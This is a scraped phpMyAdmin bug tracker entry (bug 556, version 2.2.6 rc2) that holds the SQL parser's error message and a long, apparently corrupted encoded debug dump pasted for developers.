Original URL https sourceforge.net p phpmyadmin bugs 556 https sourceforge.net p phpmyadmin bugs 556 Original author woodydrn Found in version 2.2.6 rc2","bug"
"24444","6926","2.3.0) bug in the SQL parser INVALID).
You seem to have found a bug in the SQL parser.
Please submit a bug report with the data chunk below BEGIN CUT eNrVfeuS40Zy7v8Tse9QQztCUgTJIXinLMvRGmkk2SOtrJZ3 7BOKsItEkYQaREG4NId6DOs88Mkv swoAyW729ExLi7G93p4GmqzKysp7fvmP34afqvzXONVZbrJ HC376Tbt3qqgH0zUcDAYPh Mng n Kph Ohp8Olmo2OwW6qs3qfrHz5aZev75 3m9PagwCtXeqI 0p1NZk5l UdBrMh z R2o nw G7uVX Zl3YW5N9qn53v7n6tPmy X1v7 6VEUJLamg yqs p9vC7P L 0d9rP7n68yW6f orvxOfV ulibj f39p8lUWpUVkE 73dbnsfRnJsxc2L SXOx3H6odoxf96pbON kX998pe Xb36j6 u1cd Sj4iB5 NJxMBwP 6aetUb9YWomKcvVLuUuj5OeP1H5rElVs6Ve ljo rePO6yFWZPlP4i2KbGaPyKNmYLFf5 nn5QOqdfG5VGOrFqp nvo9VNbOS30a3NIvxs Z9L jRl1 K zTsJn6irWS50XWVSYPi sHzrKJquY PuOfO T5od33bWqSjz aFkWafyrbGPYXE 7pebTTG5M 1 ssWunkOW wv4nW9z91O v km46H 3l k3 6y 9pwbHMhrKfK2K8TRKtIxOqlOhiM5VmRq 2jp4ba4kv bRaqdWZ3QngbRuWuS8uXk6PdpFGm sTgdK13TV63ok Drtyd0ENxPaFryBULTU1l 2 g8q9i TONoX RChzYGoy1xJ5IujooiN0sTisdpF m21BXKtyfWBex33IirWJC3pbJzfqYEu1plPCSfxkwvAAHs 65 3z999 8bDCZOyZzm1xtbZSpTZTF fKdJENjDuozjQ19d0362dLW1yohCG7tP1D4qtvRTHCra1q7 bld3ei9DYXn3MxSeyqp50VhzqziL 1rfgn77MTJ4Tyeg6Cu0yS xzTLsuPQrNrQXzNc4gNiRqSduo WxutjMrAcbYs5I9zm2z CJovLtJ8 0VJqDxeixl5sI6IpX9a8q KCdApTLVGr2JYh W4LoueH3dLGf Mlxf7fxQen12qxYGh4RVf1UJuZT 1bna6d wSV9nemX6nbZc4dHIcZndbExI20jLLC xUAigXZn TyZHQzwraOYuzZRkyRfgRqWi 1GEW 3ZKix O0TNODKpPQiAxbbXWUvaNaDsb3Mxot AKj0VNeSK uYbD6Yj mnH80vuJAkGeVm5gpCCMaQ LTdbIZstkyI7EPnKbLV9R rN7yUflnI fA03rSLdkNHu5 inYH 1t6J7dCN2n7U3pFeSkI1r0qKF yomcNiaz5kaFNjFdfkrv5vSne6ti gtSWTewP83h548yUs R DlzNmtemapPp0ORPwqlY QVS09O8 KENYA 0i CgQifgF2SZsy0NzML3jkjiWrvoepBYbR5OdElr69 dLkhZA7p1f5V5FTOIacmoNaR7Rk yE3opdyWcV 9YOMDKbnoEXbk7H5y07ovkJueYrH4YvE62kX 08WTIP31HtrjjWXUTQe1o4tpbsGhq syLTUXGiZoYd9UYNVfCcfwgC WlL9ubTcDGt7AJZ6enOkq8 WYrFtI lINJwO c7nKrHEtETJpSkK 1lKkxXKiBeu1AvKF bVB 5xV21ZDteW7iCzdfGv3eSut8sVk7 l0SWjO5E7SpXL9RaawPtFv6HXlt dF29k7GMZNP9p9YxWMj9LIOntCxZVas4hlY2PyUgOWix3Z NVfUv8UxIr2ILM6fU6h2WI14qs3KWk fnBpV6R71C 6t9 Ej CY1fwfQeH5RQrPsQq3tLbReOFcRyE w4jzQ13LTiEg5aYowjOFVM1FDeIzg 15wMUtPSm7cYnDLOafxqPv 5o1xsD3oCVyLN7Luax8EFzlg MLnHGYsDLQ4wtytvGGgv5qfMa9lux tTnbeDvyxogcJI6FsiGx9Y4EGlH4WUcxyd2velHSI1r3dvoGEn 0f0XeTy6yJoxIEG0M8IpFvSdKH vCO1zIYXqJ cJH6AW8B lJW3KYDGA185OGEjXEL95Z Io MZoS7nJkaZd2Mid0XTiGjZkms5GgSD cRWjW8eaPPeDTgpFBn60SUi7p6nRMfaysrHNcjFfN DT4aH Rk0Y072qd2d4VHRnOEl5aGhvcaF0U EahCVgR8EYQAeytdrLYS0U7NqpCYdZQ7NlyVcVqUGYmyC Sy2UW26PZ3Zxnu lxP5qWyhXQwYDGQ7 L0Go0BQ6inOErXOTIMK1PDhFAAqKM3HH2ezIyqOHrJA5qI OzISGwsrslfW5IBlB809OZ6GycCf D fUOXXXjK Dbv6uJRTGTFiC8R0 Ca23Usw mouke5XpOnB 6NyZWADcRSs6wWAznZ8ZegSJWGqScK6 MzDJL YgmnBPL FP6DzIFPVOI31sccCfkrdjWiNBKh C7GxCi kJ70Qe7z6idITWKKKEkopBOyVVn rclTOFT WscF0EjNWLXMODy hQriQJvJc2IIv3Hx ezGgCFI DwmEjG7nwNpGxc4kJ4KB641 v9S Lw t4r xpJbjS0sUIgdub0yiZMGNq46sVRyXfFISOq8Eb3zoiU Sh3 eFLkomOsmLKyGESkm7JSIU 8DeWjPwUp U08pj2cPEIxthYy2JBo8FsKBbBZ9Hn6nuzf bZc pBvSCbSZJYSzJvc74Bt3QOTOrY rm4cx2eI BgOCRFtnYVv4sis84rMIYlakhneKV2XrBrbcv nk4 nff719No WWa1mcjKl6ceVic0S jCdaSqxUEQ1kKZE9RT4hO4ZL2FFr47xGEox9tgLG3hzgH a PtgYG93Mf7eMC99FTtx1aj2ymXWw4 n0zPj4F0i099fWeTG0Qgjany21ujb01C FVy9otZTbNYzjjw8 NZkXVyi6vQiVaekNG5aRckgCEbn lKSf4sMeKUS2CUlDg503sV0ijfUf33 1qXptJPvznc5W274a9 0bg0jDSO4N336hJb Lcs6z6bJl9 zv9ZwXDLPud98ZerH1kGqx8yJCb cQiJya 35MYPB6PZGYG ufAjWqwqhU5f8HdiWEdJnK53dumTt URKQ7z6pozDydRTiMBA miRG9qw2bMUNkagH yhsS8mX kBvh2nNMuJx4uHe3C3v X4 xtN25YSw pPnZIb3mkBtyC0R69v89pRNFW9nWp1W5e9554DMVDzcS 6cEZizRaQRnhDBJLmk5cw5Pw 0j4 r6T TsSa jj4GPR4d KiX4b3UZhl 6LVBWZO47nOHsGtZRbtSt XW9LtKbyiiv84D87hc05JIJCsc9Jx Jud JpuSCJva GkCKVj0pazDeOHWL8tvB3dWBJ8MXIjT2Z0 bnS3plt JaQ0mY bi20 GxEYn7xw4 vkjYyeBiOmfAq6BFVGtoGW1FBpAJWtKfHcjGFFvUokomLyw iLKgNZPI2rjdzLJfSkAuGWixU1IQo sSF Xq3ov20W eYleMySBMeXHdoVcnaEWAyGI8dk 7eMS VaZ ReZoocztxZ2nlKvjm7QFlU7tJt 38VKIxBsVRDttuC1VEccXKniUl3VeRG7tPjfiDttdiAXFqa9LxT 0NH1FHLI6qBc2jl0FzNsXXt6f ccTWLgRR6elvtOO9bLhV3ElrE0e18yVujg8LvLDJr6XJbNbxl 76IUDTnw1fmDdkHNiP7SpPWcb7p WxBbTVnl PjhTM2ez9ulexbBdFJ57td6tyyzEuy45M1 bzMO c6h M8lBS4LyJNhHvyuTiKjnyULP QDtSYJ3rQses53 IzKFzopZfPiGvBov7eZU2eIFX6WnuVkkbO 7SLWYPpzKVbnOwgmzw0zKNhFe5q BFHc0XBglEMn1Yl T7 7veNIH38mauy5eSwsPWodS4 mi0 bdO4cszyLOIV1 cKa77nm5 AV5AH h dzYEjXweIrc6dZqrzg1cSYFwD9FSNmZD8SAQoj7YMpMQo kWAYc0p5qEaSeCgqgWZq3dwEy4xO239 ArPTUyEE06DeSquYfuJC2VcIVLOyRLyViCwlNy8Q GeishHA 9q53FFjPsvAizZrldBQ7jaoS5MU4 k1QFsRJjwtxL 9RY5FnekvvdGVbXIBi0iv1Hg4HLqV0Xhxj2Ut dXQIBJyWZMyagoiMV1lpMTscps njfleNdvv3fO WmM2BkrPic 5nWI4Sk4mFd IWJDT6sd8GL axLtY3nkwElKoylhuogzFyF7srC1K eFPuzfGix1t JK 7T0TRyUWKTtyiWknP86jiT6gS5S8FP2d0 23O99xFcff6UHN1fZdpd6QmrdOU 7JTSgXSFj8 Z A h7OnFc5jyXlp5CrM7UgxXaleyFahXNxtaj QvaKOLoWEhf2YW0HFNJ298Qgfdp XJLHhsQJ2N dTH0OcjJ 4HHMLh7HjBfayuNo1MDV5OoUe5I cHaJ EsYGqWpE2pDidO15O5fFRKvK hsSOF6Qqk9BpIYIqzw9yWfKGxTJtnY5zJp7dixzQS RmI9pr aHe0 K7fzpncbWYfz5numIpKyPg0 RQa05osMt3CLbB5gyzgvqBtKc7Icw4PI3xW5zmRl7ZBrbMp ekbn0f7lBUgLMJ4kLT3dPbbE0YKrU J3FEhqc5gAvl5 yUV9Nm8ktk7doUqkwlnBbtkA7yMjgJUatRs 7jzA n6J9EuKjSC5CKBuYEqV9z3 d5cdclmytFg2DGejs 68kkiQFNGKvQPa6lF YWnoeQQxcRz 1auV3aU6QVMzvEeUuVYSJeT4ESeL s 2h2O7wOeuoYCsbb9N iN4bJCCOssazd L5hvezNe33Alv TU cP3lS7OHrsWqG IPngVVBiEOol T1pMhjhaG5EXMO7I4w5P00IuJYoQCUrA2etmF0WjhBSfk W9tmrK37xMscYyTeYoM83h4ybqmp 4f bSrmc QPBq6c9yiTenQFmL9RCeuie8imjSSbNup5hu49LU NjWfeTFE bkuwUOTOaVI2a9CcsVpUO fyEJ7ALyAQkAWtxw3OmrL3TOVsi88 a0mvQXiyNikFG3MtC tIX1j hwLOCPYyTvBqLDDsSwLSoB i6W2ipLBZLw4L37oXOEbJezpZDriOJq4E7ULBzIq4ht t1Od3 bjmDuSHNEApUO9T9etLHmoJDYm lSpzV5mq1fXeoLIPidVm2OcFESZa0yuFmNBen0QFUlaruAx N2FcfNzggsUX95JOqcljdV3lBOz p vAim Wmj8uKtbhX 5CKr4Hse4hV qWV3LJi4CsMmZ7yA 0LaPIINw1qceGFrf 7IdxWgYBP936eR WewTNkB1vtdbLhVf63xL xajoaKKlHvU1gTKzuWXsVQb LH c84kaDkiAEK3uLdsh4pwwz2jhy3a ILpiE 7BqD8YfPbc f1nz7fjt2ev0ZkePOecO4oo73hp0j72uqO M8JW1Nw72Jlpz1 xK7zigoTlB XWUAdZySVdL5xkRh1BF2vI1ycBwRnuUQmZuwsDNY2MxK zD LzOqwh3z3bke8tdXFhSOetOaIJx g EQ HrkLxPi09YyUdDBtKWmL8j0iZP6CosYaHSDcrbDCkq79t u64eLIYX6bkQek4b9Jw gpajU1ri C8 NwjAsyHfNCjxpDavNg6kESshyOXTUVUOV7CK6 uI1op qzzGKSBDfRbmlZIHAPzPrAxdorq6Ux yaZS JVmpiCNweLjLbSO sF K 0cOC 97Xn5IUHAu3yIm m llgmCReAKSH kMCgzK xKoTUzaucq 0cTSeaS7ndqYpGXskFQU W3CjZgD6zLrCWIFQyU1qA6is9 5 Qqpj9Q9RvVp9q hOrCA db6IyB W HW91QYP64q8MQUABQUpjssYkCMBoSqww45IhRlAPljBcn zK0MUQe yj71wV3 PHl0mnKaAD8Ha51 S1qZIn4LWQnnSDiMrILR1zLVWSKHnB36ncfesuFjb9nwLW 7Z6G1u2ahtt2w4FfndebGNremgJjUH Cbtore45S1vAsLj d7m0tVFdYyHgsMOwUXnp7Px7Tfm77t dRhWv8bTc T6janiPUfX3pzSZWp7S tO3M9F3LtbQH 4vFV4ULRguhsNSwGwDqoFGLHKVbU An mK9xTmSvMKaYxnwpd6SYdkSCZ3J34Wdx 4A7QeHTFIgTc6ArRd1U4HUWZGBjH 0rv0R37whDHklTtvD bqdZRv1X Rn16p70xGzviLbRblxU7j Bayvcw0HT9G ylx9m9PF40qbnyz93z6hjT5ewo7PbhwT8E OxLIbBvDrrMiQJD MiZ2 EFoVSJN9b k7mcquGKpzhCTygw0W4NGiLzZ R3deB7WWabMiFOqdlAt Bwf436LEArpOafijqn 96fKbDAPfBzZ bajzba6XJnbOmBTJRhzQxP2VnjZ LdKMSy6M2yduR9cJpF7 hXLMO7V54ErqIyEOum0WfzR h47Gf h2S 7K9lIn82cJVHpw7yj2Weg zXhUlTgajq BtSgVECE2tZI rMUAlAECnkFdS8nJX5yHhv6PIXq x yChdUKThSvqPO9Jgtsi v5UnIRGQLqSEEtDxtk1UzGxr5xxV eeQqLeqoiUE9nxoRmAEmb0rLmL wgTU7rFxJBfYGUvAYVtaWxDRYJo8kk Hb8Gnw4f41NOhTY xK6566U7JORpC EwwpsQ1rReQNSE9 YlEf0 GxZRibZNpwZlvwKSA jw JHUt E2WkPFvMwZOJu8S dH0j9bS3p37xfmeraVxJXWA61ayuc 25UWjjXMAsjNZbm6oV0nHd KUTgjfWlYioJzwd1mZaUmQ 5xjlr5 jHTFDh i2sbeW VCDQNn6l2X vVfoRYf6f7ElKSpGGin4 kBSkzncU3KpXIZVXKMcKAlNDc8O Fqm0lQ5NC3ly5npiv3bZd2IYk0i9 gvjrf9OAYoAq0RUMqnPqSLvv6Jf0baxtOLIfJTdyU EOihn E D6jVT EZ27d7WCyse9AHrkO5LX1 7Yf 3GnFusbn6 qHly8H9D dzz LyMP7 Ks3q5i8llvzTH32fPk 54vifPcf7Tx8Hp U8HAenl9ri mI rVEfQxuMdTJ3i VOOd zQ8WI5D8bZYvMmytt2eSctPd3 pn3a648VbnO6DmRh5qUWHO1xMR867 uCpJeR 6bLr6qE4zS81hzcQ7 z4QUCBoIm34ayPAPAh81 l IdoC7jMxx6HGUSAB5GP xKzGkXYqW b0m 9hZEOxi3yR2ddOzZcGICqoKQR8FS4N5SwyLiqDDM5 iCzhcGsLMHtiXqLC7bDEwSNpjId9PL JSqqM4AgWnEJyLRlh F yaEga1 Cyw5mJi8yi1Dk21LnSbQ U7 AhRncbbhurO6jJF8Dqik33LK8u cRqHJ6H3ivERQpsl3olwPO6QjEzM9d7LA85uG63XuBQRWb s 2tzIO2tdvlHoyUZSLuSEED7eu Qf DF9Dck3aJW0fLBl4QWIsb0urRc2EgzPxQN9CAhD8CJ8KLM migVwqOLQkANceVZ2lRVau1 E5f6F9 tP6nw6jalTG7wKgysQgOpbFxWFV1lutD4kKXAmqLRTd9sP QNxQytEoS4O230xqBYXCjipYm5lA0S WtQgApFdF KS1Pg6I ugmUxIyfFFxFeav6q034puS94VSS8 x r005 8d9OaDzOI33jaZ5bLsX 8P CWl2tmNWW9eknhmPnOobQ7z5mBeH2DgxJblZeuFguEq Wx1zdfwDNcGb7NOH8T5NBwfQtNOH8bfyO edtkUBtDBsNJhZX3Jxzu5Vhf8HCs7wdDIo8 tm1HO2tpvODP C aN3yYa9GCw71pnetuOw534dIGb enBVEg2vbbqNOIuTmHRr9uiCLzHlINYHjHW4MQWi5JK0Df U UT9 VJDvH5b5Tdf5UBkXVJEW2Rks G3VVe0wR0lxxT3rkEYUYF8YyXZqQgKf1attF79FA4jOvaxKp gvRtDvy4bQnYDTKRTk4DIIirf JQ 55y6CMmy2GwLwbjnLAaGgaIjzo3GgoHEUyu5MJSr0jEDSu Y4VcnLvnJwMw4AcfroLq3gwjCnwaWp Q R05ZfBK23bQXlstqrGSUguBKXDi9Ac2zgpsoa6qvMTo6Mj hLC0B0khoYCtFJAaOiXcqUyGcqEp 13clocuoIyilpw0pfJiJBQrVJlo1S9neIxfVPIjRxWMauQVv2ia5 glPJ1ZQ6dK SyKxc047Lw9Ou AGXt0bAKW8qMh9rmfSLpFFyUToFfkKynbXSVn77CUMhoz YV7KVGC Pfnj8zupLel6nrWWWgSHu i lIaO6RogeXwmzqT0TAJwMeAZ8ieZHUcLv0h1oNjE Fb pS 0j yMnR0JRdagsoRHZ2OOlcwbriHX uQd6jyG9oZuXaFESZVIfi65A3vMCE3Xgu5UZ VmaP0GPM6 Iu3nDrG7TSRfTOZ zDamULqQguUh kiR if0Z1PV4 iTjomVGxugggg9CAxlfuryqv6og4wEP3bJZc X HdLlFW8x4jwNzLU9j7hmDpFz y7limGw7tg1tNXzPVcPzED6ZiIXYjkPVJ0I6UH0eJB8VvpjNqp gkQOLb ZnH6 kbcfgUMhibuzhd bSxr4y0wtGN7 FPSoMPRbOpGZhDfWeD5Sv0eG0trFEZv4ii ElLBctrOJGZlnr29NvzWQG1OPuOh6 636qZpBWdXDV4edG87XamTg09QgVqGvYXtwcy5sEC5Hk 2zkYEpJzGBVbLuMmcWrwwveIEJtNbHdR bp7zDs4Y6vhx9d0tw030ZxCM5x53GQtxtNxvo9W2Si1Ir80K F7QrsxAFj4delxfpGrNIcxAb5NiS qkoE7CT3aWTwoKsbI7FHxH4vVOEGlWkLlw6BHvOm3Kpad p1dSen1FgWfUmtXcSvK8qA35Ex4QClQ QaX oshsyi6IQ0ofK0HWwcXvqolSk9YgrLrNBjOH7n8FbOqs QkaHv8rJMLfPPc sSU22R l2IQbN CSrqezg5NWtgQRc4B4 xmOZa2sE9MxfIHI7dWDUizDLCjC pn2RV0m6VLLSsxZFHlZcZATwJ76rU2 yjo1yjRsqDqx3aA6ATW3 KytLWHe2DQVzGYpT94ZICfEm MFCBsykN5MQwcTDu7SF5TyF5g717ksp FAY6Jky2Xg70866UAPQyCy 93jQx5hJDBW1ffaOB P8GuD ECQE6xLipuY0Sw 55lSc5g4yoP7TZ bOamrLyRQYHzd0HCOWPr6psQV6ZtnzH26QttKTCsj8oPkP 21BHS9j2GtbAFALJiY7jfYCXlCH9s7 6GuzT4A4hvEBZMs94 ZOskdDhUPG YDrNyYp0bnDvj6Om 7zTpABDOMPeXw8yA3eJOSg0qPN1WpeA Z VkTEAGY1aMxpk5jsVBpMa7LG62EraEEnYGumVhO BA wPq0dEkRJ5xzs4Jjg5T11eM3Xr8Q612 Ns97K3ScG8wHwdQcrmnASSTA48oB5640uiFzN2de5wbM 7yCQR 4WBMMGCe9pusSWTpFuhkczht4N P6p5K2Z3Yd6evtCyazMLBi7kxTFIZvU8pYvSo9MyJKkwoERA Q4y WWsg8vFpZyTC4x6KUQ7 2H U I2d1gJBZHJMV4suiRPBFtwcn bte16SxBl6rQGkyOisn59lpjpL byE2Uc2VVSN7LGEUiGaqyCgZp dXdp3qIxOzWBJTr QmSEH2 JVOzwEGvYJp367gAo2CuESt dUYgx0KDOT18cFyUTkbKpWP7A2BZ3T uMwZtJH8OiSPtpBA7g5BgQSDnz 6fHdoC3 43QnuCOyfvtC yuzMfTv3dkalyPDoFIc4qhMYIlzz6 8Jn61qEE8P1YbUtgk1Y77DLvDj2yHbN00DJWpv26RBNiLyyR yaj7zeSuHZs0BBstjavKsejclaTy dXU HrgEFZYSIXM9Q256rKPejuNgjDrqQLVYKzzz0H9v6h CkRDvUSgIwUUbCJu9yJB4oW0MOXYF mJ1X0dqZIF8gGNWp52jWZxNzcdTWCgyJvICupiX wsubhj H rGmpMhOL5VT13K949pIMTHbhl5Ul jdFXC2 o48SC8fkAgyc4r HssvLFC207r0ng3Hd4p KBSar16 FCMQit97kOeDF4S7fgtpG7pkKWJ FHrEm6BHdhtOxH2yhiOmkSlBXBVtYPThoenp3h6QhK pWL 1Cbd6yYcsk0SSYOclL1uIGyOK uOxc EjqiClFPsDOoo AxIgbw gIJe hAfqdjmbp MyRY9qrMYffVJ hGT8a4tJfLjEsvtIxxFyMHCs3W CssCthGBglm7VCwY4PR2Xgu9O8CMIHtHw3oh1UHSPdU8G JfMjUyifcLyxKGsLSBqVpndh3cfrdQN whzs84jFoTcC6YemTmgL3xLdhp5vy6L2TZ0pPPSafyjyEja wj4nWtRknBBY7UEkQwjucTBhOSaql fcNxU49OWfF I9aw08lBhdF6bXjUtUgir84lDQsh7q7BwjldJ R9q3BacOkqgDwXrwJeaN9VGFVZ CLtalSnPufF45nLMLIVhGqrO1 BuX5JjRKz980cAoSiqw Haj dzKmZgEU6Qk4ed8BsZRd0EMDmgK 38CKQphTPpRNJ Nb22mfeZ9EuNe p17SPRBFo7OJvMH48 Rb IHDHj102KP2HfbY3d8a3EWgvyPf eEXOLG4L pecLpJvJL7kl4JCQBavPO0zg5yIyuI43gQ0om w YwDpr6phSjzDNqFBPgI6WW6w5qU O1dQ4 Ie6OL25chZcy167Ynp1wQVDrleba2NYdo45FuxRX P deeCzOOXxfdFPFWK sUJpg gwNte iyLB fBFqfRIWqZRzKk ntSVoT m8wVZS3uLOWDHaouDE XB2aC3LDGEpB iO2odbOQORrLQEF5po mA3B 4OVn9yOyUPXZ9K66zPx1 ecq9dVEqLwRkWPDQqR ns1IretQclpzbchwwBygLGvMWiNNuLrJ G1qrsg8WJ75iK gyOTanepUpdSogEDDaO0lPqtw50CcWFo jgZwGiSOfcdOozQ95Nlf57tB4cc Dk IRadtI9FF6OTGAeInDXm TXyPy6TsI4yI8dUAQiyLnDpmtfSl heSw9WlI8lFQug3RsYFdfDnzPlo ZeIwnTcIGp9Fwp3UOi09WR0QBHcKfdoIgrcu9knEHNd83aA bIKlkSBe8sRPhvtcIb4YRoDgP3Ede FqBKtxLobsqPCxUxiIwIjoYAzuHO4n87VU30nozbzr UCYSZ0 O3RTP AWbMYP8D0i3HbmH6y8O60 S9uQZvUZq6rOtRYhNr6pptjoLOlJE1czAbrmBmgV27V8Shz dSm1CKLxNyhFxB0Da6Z0VKEcuWkdM kRzBrfME0yy61WD4YODDEeOmxGobw09cxeV GfXXOETn mjD69damIqkbAWJXop XLW8AshRAZjEq K5UId8LK0IimK3iWL a WiUWxp5sTfl HzAprf4Pt oni8upZb zQvuux8EBQSXKAkfptIoilpKwT Eus4C5JlKZuBXvneEa7gSqiD2kUbjno47EyAPMfRzrC14pi7yt B4xn g4M7GeKCoWdUn14JE2HDq y3ckBFlL8HNK0SqX7OBgdLK1 b5oyldIAlxvyU1uuAT9o8Tjig dUl6x6nR6NUZ fEFnig2iYo6tS qdGjApT7UmG0iT88FUbfcfmKTEet0yDTUbNiAPKJV9tQDZU h6wNRuV4bLw4FrDKx2c8fGdQeZc5q SoF15GoKmZgnmAUfJzbpASaGtMsnfnxi5BJta iD5o3mYXW YAkj84d5Vq0yvi3ynE7Kk036dSZpU ybfg4SgJbfpOZmjRtRsNhoNBfTL6liMWtKdeFiHr6EHPkfC3m 1OPGun6OpDEBhg3ldFuWMfLTfJB jkrM Yaj28js y72cJqmeyJ7i d36bbwC 26LViSTxz7zGdtP FW1NJKGQ C7L1UBI1cK8IOND4lh 3FaEz8lSZsfjBMzytOCCjxXQTBx 12pTApu5 k6OWKASVM2 PHENWQO2Ko4OAQx90ZVio3LUK AFy W8sVxTKGEaWvpt vyw 9fKu5JrFOvbuw3DOROYLr46LnTe 4vGjcI5llUCZmmHQZPzVdNkrgw YqC QlTx1qbvdBMWD9yE4UM3Ydi mzCqpVPnC gJ8OkXdbXR HW4FBDl3JRx4QCAIz2ZEZsjWTsjjiLm BDK8EfwZn7t7rSBA1TAkwYQV1OJxjIv20yu2tKjN1qnBqlKe RGwPTQx5Lhj6J0KgLqhzDWoOry0y rj6Ig6Z33PknF9KTh1hz0j7WnNasuQGwcIYiuPDM3ZWgD BhdzqsLI0up3Yk9U5LK3dYW5kz6jAQ XCyqsjjpfiwfhndn11pBkJMowVJHDvPbcvsyj8VryNVjLt7pLO K6BYZLwzwHwdwBL Gn1NEupLJM 1lvbfSwls erpKfj0NlDHDprH4cuGhyqfzNL2zS418ZwyDFFOb SXCFUMWQCR0IRbSAhdksY2jmjv DgzJ2XHiqaHHrky4fLCRUmpbDIao4moTvjwF94Zznprl0gOj nZekslCFGYHStLN7LtXfxc7mKZsd 6JtlJxKNJZsYzuTsTNMvnlqSBsEDfBoEreNTV VwciJeJXEvcp TzbCXMTca8wo07DIwwBOYnhikf BYpPyxmqaSSZKUppBHV Sd6vT8OJEG8YtIpvpxOJj3zj2gf2 wmQAy9JZ7Kqs1cYUvqt1J lKCGHE F8 ypEtNpEkOjXLfWeXZPlp6Ti9yJa39MlfSC23jyqkbYPQC0 SgTer0tosHK0ACjvrNI2Lyy4aYp CriESVq3UW9zxsNctEdarupDlZCXTog2cSPMV3XyzNvGjG6 W4GvJsbpsDNOI0zNVToZv6dfk5yD5 en2Sz5EQaXVDJeTpwwU8H53t9NmRPnm8WzS5zJvTBwIE 02nrAgTTaVAVFXXIx8liCDTzJgX0cYfZ j2nKwwP3iQd84QZmX3rU6MJDtQKZnakt phm1TDK2KnYG voIeYmzD2maWRLCmhETxXZAWlnHp n0 VmEuj38WwUIULScmtjTaBPDSD8RlXlhTBr7UW8ATJ4dN ZU8PU8OH LJYft4UpK5PziWcPTsFDY2 GDmjJQbiRIIYV3cUgyJjSLwIhurW3SxIjKGD2YQ9 csqErmX 5MCtTkyj87Fq mpKjLuHGGPhl9Na rSDu5AJx2RJ1hK1K8M8p7G0iX8ZcJRE3LJ 5GJC7U2FJnFhF R8aqupeSkz84Qcjf8dDVmLTvasz9 ZCc0XJBNexXDuA07FS5UbDc9d4w okU I2UpoatGIqvyrI Si XV6TLruWGcuqqj6vIXid ZiJy b o 0lKiLVXQL5TxRi5DmR0N27Yn1ND7XLsrkRyfbObCfW 6T jhDb9v2DSebKoKm3lMj SC23jx9lg fm9 ofAY34jA1MFUrj1GxSic2R0EiObBuKhSgNWAfFl9jCLO vSjqwhzkhk29wmfDzEV4p39HU9u8 hYGtmYujvIIPiVHAMgH0f3P12mY3 bFv1Vf AeT 4dUV0Qy QRREiB4nFFlZxGZrwyXx9WtdDrLdo HesF4jj8KykJ8Vi5ZGtHzoN0nHnwwQY4dOKyJ9D4lfLCy70y7 ZNADQ1DxTHPdRisW4Zi3pDn1a3T vSUEAu0PMrNRAF05W74CvlW8Nx 4aBUsIpexQig ZuzTkkh ni2jt5OaJkVTfakRgOWJn9Lq2nVwS SwqSkac6uZ6zKijw1GEq2tZl1qUX2sa6c5dUfOnBOmROoII N5oDK2R3iJgsrs23IaWLXTCiNnzih wsF kg3rWAq6tuUOvA4KnNnHVRdQJEBJnMtZcR6B70hf1e Vck7qRctayWv5R4CsNGnMrfGzFm7PL MtloItWxSduo7d5KPRTLB0MERfTZmcRMR51fZmoOToeRJv Ii9D1 WrYOHio2CNpXbBD4YgOHLCBU 7Tmqkq7z7Mcn0jmO3qwr 424UVjWVd2PeiEIjrE4vvVCnL qjE6gjW093AsFDJxC07gTGo9OLcaU2 usncRwb inF5xU1zNeLXRiMpbn4zqD3snLp9aATSNR4N oS SX2VbGIpoQM822mRaAVkflT 5Arh nrgumonwwMGNR 07uPHpwamr5rAnV12WV4HRrtJ5bldR neXQqvMTYiOkGn6gRXQ7pzKP 45d0eJJ GDp2c2odlzivrzqsd0J uhzJx5YfOqZx 45pcnZM1zaOwjtKQ gXwnPtnetwpGTby0R4Hl2tR7sqr wCqoXHQ uYR7x L7giZY3QPFuXIuZzDE KfngKNhWNiVzgo 8adMZTM OoGpnMsAgQAaFlsmlaNyz 9F1EBPyGmLcDuC02q qaYCf82M3XBeN4MiJRw56fnfiTrbG DxrNGNxctyKM7OBuHzPudvnEAy1px 0X RqPmr BepNasL8yonelFLgBMz8EkkwOwhCTBrnwSYV7 C2ywOn5hg7mfNtORDyrYd40PS9t5hE vemq763esvPYxC3gIWllUkdPK2QzxQ2 ksrzGTEGQ NJ9 e l y0s4iFKSazjx OEJekoxNy4GwUx zJSMBmehlwm3sTSqVH3gvpqlXpnpZI6XRWaci8kJo6bL8q 5JvsUDTLt4iGnbFioJJi5H1RCZnK5C uTspmH VGFeWw nc2FB791Da yu4nsbJSL1PX 3gYn6ed silRQR5zpiQjxM92AFWMu4if wM1oS BbogB3dVSBNedlcXaV0KFIxaxumL4Iy8rlGE00oc9nTsjd7vZl 0wx13gpLt6vmIfbTw4KmDaM0Tw d 7qSDUlKga8GCdb3pWs VaC0TvYaYOLDL 4DJXBL7SF4 ecO 2PhBltWk9tUlEUSzl WIaOlhuoH b uOVdCaEIfbwch3gl0pDD6I0aEbulm8a1VNZmL1jgvmLic bie4q3aIwhDHt fVMbZHS7coi9bGP IH C3Tux RSp55iY0 7y57yBc7Y5eozdVEuSpbaKi0bTweD Hr750pTtVVqIivrvSfCixAECXaVdM zoR1FQf1rBxAZ0dyoCMv8sDHFzxPgFMf4XMpkkTjcoEaauA hm1BmEsa8SCIdYoU5gBT3UWjawqiT wDWiXhdlkpw1PEnJ8q9llMkEofwmiuN1GTOAYRL2yL0QME 7kiyI0NPC04iaP98GYdaBtqN5Bp9 D hVj8BSbFY6ySFxnyylrFoJOZC dcmyTnFK OSWcUpGyBlcp QAk7tVAKDuRUFtuQSiBzsrRxvLw 1 FAuAXaFuvP5DFwyFwKFT JK8pBc6tWG0syREcWDfa8Qnu urbQgMla6p8G7XM6KoU090tbtjLifPK iOhtKJ2oyT2uSn38TIcuWSh6A 9Sxmh7Exfwp1GonB9Qgv2 5yjJiaPJoVcZSor9tnkBN7bvO4jE0 Vy6MP1TvELg5h6Jv3InZXWGbo8d8ZWRHQoVWXZrZaDhy eTA3laOmuju0lcsl0CHwAfTIVrV7hOLe 5ggc5HatVls04GBewWVM77YuulWAhN1YwCQInr4vXBeDo 0xrsDi5BaeUqYnqemWdgn8SJsT6LzAh HmMz8s0ttCxoga7BpeI5F8H1fRCYMrHiSSe5RySP8toXc0O N44NU oR Pv1nl k w f t3z1f7fz BOZHZXBSnLklN0ysDzoAZ9 dUpY1KL8uN8M1snAJcpxbFBY 0 M5htblrVmBCx9FA6amaeXnhK7Uf gGAYnWFnHCvKJzjc eXDnYM6odGk2UCMdh3seOhFW5FF 6B6vZFtVyewmMx3NYXIXbxnl5Ef11ohY bc9v1ZFEURN ZBOvd0ePVbXnQ5salKatXDoIeoxtYZvtk3Tiv Y6Gg8VZbET9SPRMEBjq LQlTjKZ 1JkvcZsyQzwVlsBZS8qdyWD4FAJZgnYV36wjFhF6csuT9DF vVleDezAcTwJIjSF2PsAikDnLzCa 